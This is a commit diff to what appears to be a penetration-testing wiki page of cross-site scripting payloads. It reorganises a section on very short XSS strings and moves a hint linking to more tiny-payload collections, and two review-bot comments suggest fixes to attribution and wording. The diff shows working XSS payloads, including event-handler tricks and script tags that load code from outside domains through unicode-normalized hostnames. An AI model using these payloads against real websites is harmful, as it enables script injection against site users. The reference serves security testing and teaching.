GitBook: [#3020] No subject
parent 15ca21d79a
commit 5b391bbae7
|
@ -170,11 +170,14 @@ onerror=alert`1`
|
|||
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
|
||||
```
|
||||
|
||||
### Length bypass (XSS in 20chars)
|
||||
### Length bypass (small XSSs)
|
||||
|
||||
Taken from the blog of [Jorge Lajara](https://jlajara.gitlab.io/posts/2019/11/30/XSS\_20\_characters.html).
|
||||
{% hint style="info" %}
|
||||
**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) and [**here**](https://tinyxss.terjanq.me).
|
||||
{% endhint %}
|
||||
|
||||
```javascript
|
||||
```html
|
||||
<!-- Taken from the blog of Jorge Lajara -->
|
||||
<svg/onload=alert``>
|
||||
<script src=//aa.es>
|
||||
<script src=//℡㏛.pw>
|
||||
|
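Review bot: the attribution to Jorge Lajara in the Length bypass section now survives only as an HTML comment inside the html fence (`<!-- Taken from the blog of Jorge Lajara -->`), which drops the link to the blog post that the prose line carried. Keep the linked sentence above the fence, or put the URL in the comment, so readers can still reach the source. Renaming the heading from "XSS in 20chars" to "small XSSs" likely changes its generated anchor as well, so check for inbound links to the old one. In the hint, the word "payload" sits outside the bold run and reads oddly; "**More tiny XSS payloads for different environments**" would be cleaner.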
@ -182,8 +185,7 @@ Taken from the blog of [Jorge Lajara](https://jlajara.gitlab.io/posts/2019/11/30
|
|||
|
||||
The last one is using 2 unicode characters which expands to 5: telsr\
|
||||
More of these characters can be found [here](https://www.unicode.org/charts/normalization/).\
|
||||
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).\
|
||||
**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) and [**here**](https://tinyxss.terjanq.me).
|
||||
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).
|
||||
|
||||
### Click XSS - Clickjacking
|
||||
|
||||
|
|
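Review bot: the rewritten last line of the Unicode paragraph still reads "To check in which characters are decomposed check", and its link covers only U+2121 although the text says the payload uses 2 unicode characters. Suggest wording such as "To see what a character decomposes into, look it up here", and link the second character too or point at a lookup that accepts any code point. Since this paragraph is being touched anyway, "2 unicode characters which expands to 5" in the line above it could become "which expand to 5" in the same change.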